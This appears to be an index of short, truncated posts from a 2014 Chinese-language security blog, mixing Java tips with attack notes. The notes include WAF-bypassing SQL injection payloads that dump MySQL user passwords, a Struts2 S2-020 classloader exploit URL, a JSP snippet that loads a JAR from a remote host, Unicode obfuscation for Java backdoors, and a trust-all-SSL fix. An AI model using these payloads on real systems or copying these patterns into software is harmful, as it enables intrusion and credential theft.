2014-05-09 10:40:50

2014-05-08 11:00:03

Java: loading an external JAR into Tomcat's StandardClassLoader at runtime via reflection

Loading a JAR is the easy part; unloading one is not so easy. To load a JAR you need to use reflection to call URLClassLoader's addURL method. Tomcat's StandardClassLoader extends URLClassLoader.

    <%@ page language="java" pageEncoding="UTF-8"%>
    <%@ page import="java.util.*"%>
    <%@page import="java.net.URL"%>
    <%@page import="java.lang.reflect.Method"%>
    <%@page import="java.net.URLClassLoader"%>
    <%
    URLClassLoader c = (URLClassLoader) getClass().getClassLoader().getParent().getParent();
    URL jar = new URL("http://javaweb.org/jars.jar");
    try {
        Method m = URLClassLoader.class.

2014-05-06 15:07:55

Safedog POST SQL injection.

For some reason it does not block /*!XXX*/ in POST requests.

    id=1 and 1=2 union select 1,user,password from mysql.user limit 0,1
    id=1200000 /*!union*//*!select*/(1),user,password from mysql.user limit 0,1

    <?php
    $conn = mysql_connect("localhost","root","123456");
    mysql_select_db("test");
    $sql = "select * from user where id = ".$_POST['id'];
    echo $sql."<br/>";
    $result = mysql_query($sql,$conn);
    while ( $data = mysql_fetch_array ( $result ) ) {
        echo $data ['id']."---".$data ['username']."---".$data['passwor

2014-05-06 12:48:32

2014-05-05 14:59:56

Java web: getting the absolute path of the requested file - getServletPath();

Previously I obtained the absolute path as the web root path + RequestURI (see: "JSP: getting the absolute path of a real or virtual file") and found that approach both cumbersome and inaccurate. When the request is http://xxx.com/test/ and test contains an index.jsp, request.getRequestURI() does not return index.jsp. In that case it is better to use request.getServletPath(), which returns the servlet path of the request.

    getServletPath
    java.lang.String getServletPath()
    Returns the part of this request's URL that calls the servlet. This path starts with a "/" character and includes either the servlet name or a path to the servlet, but does not include any extra path information or a query string. Same as the value of the CGI variable SCRIPT_NAME. This method will return an empty string ("") if

2014-04-29 13:01:27

Java: trusting all SSL certificates (fixing the PKIX path building failed problem)

When Java requests certain untrusted https sites, it reports: PKIX path building failed

    javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
        at sun.security.ssl.Alerts.getSSLException(Alerts.java:192)
        at sun.security.ssl.SSLSocketImpl.fatal(SSLSocketImpl.java:1884)
        at sun.security.ssl.Handshaker.fatalSE(Handshaker.java:276)
        at sun.security.ssl.Handshaker.fatalSE(Handshaker.java:270)
        at sun.security.ssl.ClientHandshaker.serverCertificate(ClientHandshaker.

2014-04-27 22:27:26

Java: exception when getting the local IP address

Getting the local IP usually takes nothing more than InetAddress.getLocalHost().getHostAddress(), but while testing today I found that this method is not very reliable. A server misconfiguration made it impossible to resolve the IP address from the hostname, so an UnknownHostException was thrown. The temporary workaround in code is to fall back to NetworkInterface to get the IP if getLocalHost throws:

    public InetAddress getLocalHostLANAddress() throws UnknownHostException {
        try {
            InetAddress candidateAddress = null;
            for (Enumeration<?> ifaces = NetworkInterface.getNetworkInterfaces(); ifaces.hasMoreElements();) {
                NetworkInterface iface = (NetworkInterface) ifaces.nextElement();
                for (Enumeration<?> inetAddrs = iface.getInetAddresses(); inetAddrs.hasMo

2014-04-23 21:23:15

Struts2: another high-risk vulnerability disclosed (S2-020 patch bypass)

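For the earlier S2-020 exploitation method, see drops: "Struts2 Tomcat: DoS and remote code execution caused by assigning class.classLoader.resources.dirContext.docBase"! For now it is unclear who actually published the patch bypass.

The Tomcat case that @Nebula posted earlier:

    http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test

The bypass is:

    http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx

Additional notes:

1. Newer versions require single quotes ': class['classLoader']['resources']['dirContext']['docBase']
2. Do not try this casually; the exploit code will take the target site down.

By the way, the // NetBIOS protocol seems to be Windows-only; on Linux it apparently cannot be used directly like this.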

2014-04-23 14:12:32

MySQL INSERT INTO ... SET syntax bypasses 360scan's INSERT injection filter

360scan regex: INSERT\\s+INTO.+?VALUES

In fact MySQL can insert data not only with insert into xxx values, but also with: insert into xxx set xx =

Submitting:

    http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')

Submitting the set syntax:

    http://localhost/360.php?sql=insert into user set user='admin',pass='123456'

The fix, of course, is best done by adding set to the pattern.

2014-04-21 13:02:48

Java backdoor: Unicode encoding

By default, Java source code can be written entirely in Unicode escapes.

Suppose we have the following unencoded Java code:

    public class Test {
        public static void main(String[] args) {
            System.out.println(1);
        }
    }

The encoded Java code:

    \u0070\u0075\u0062\u006c\u0069\u0063 \u0063\u006c\u0061\u0073\u0073 \u0054\u0065\u0073\u0074 \u007b
    \u0070\u0075\u0062\u006c\u0069\u0063 \u0073\u0074\u0061\u0074\u0069\u0063 \u0076\u006f\u0069\u0064 \u006d\u0061\u0069\u006e\u0028 \u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d \u0061\u0072\u0067\u0073\u0029 \u007b
    \u0053\u0079\u0073\u0074\u0065\u006d.out.println\u0028\u0031\u0029\u003b
    \u007d
    \u007d

This code outputs 1. To make the difference visible, the .out.println in the middle was deliberately left as plain text.